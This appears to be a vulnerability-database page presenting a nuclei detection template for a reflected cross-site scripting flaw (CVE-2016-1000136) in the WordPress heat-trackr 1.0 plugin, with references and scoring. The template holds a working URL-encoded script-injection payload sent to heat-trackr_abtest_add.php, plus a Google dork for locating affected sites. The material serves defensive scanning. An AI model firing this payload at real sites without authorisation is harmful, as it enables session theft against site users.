Lucene search
K

WordPress heat-trackr 1.0 - Cross-Site Scripting

🗓️ 18 Jun 2026 03:02:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability allowing attackers to execute arbitrary script code in the browser to steal authentication credentials

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Wordpress heat-trackr plugin cross-site scripting vulnerability
13 Oct 201600:00
cnvd
CVE
CVE-2016-1000136
10 Oct 201620:00
cve
Cvelist
CVE-2016-1000136
10 Oct 201620:00
cvelist
EUVD
EUVD-2016-1080
7 Oct 202500:30
euvd
NVD
CVE-2016-1000136
10 Oct 201620:59
nvd
OSV
CVE-2016-1000136
10 Oct 201620:59
osv
Patchstack
WordPress Heat Trackr Plugin <= 1.0 - Reflected XSS
20 Jul 201600:00
patchstack
Prion
Cross site scripting
10 Oct 201620:59
prion
WPVulnDB
Heat Trackr <= 1.0 - XSS
21 Oct 201600:00
wpvulndb
id: CVE-2016-1000136

info:
  name: WordPress heat-trackr 1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Upgrade to the latest version of WordPress heat-trackr or apply the provided patch to fix the XSS vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=798
    - https://wordpress.org/plugins/heat-trackr
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000136
    cwe-id: CWE-79
    epss-score: 0.03415
    epss-percentile: 0.87335
    cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "heat-trackr_project"
    product: "heat-trackr"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/heat-trackr\""
  tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/heat-trackr/'

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b5e092a5bf093e49f408d7123070e272a052f5638feebd3652cecc6c5dad38c5022100e216b1a6c055d6dda3273d4a3a96f40aa63373a67c3c25737b70661ff0905720:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.03415
14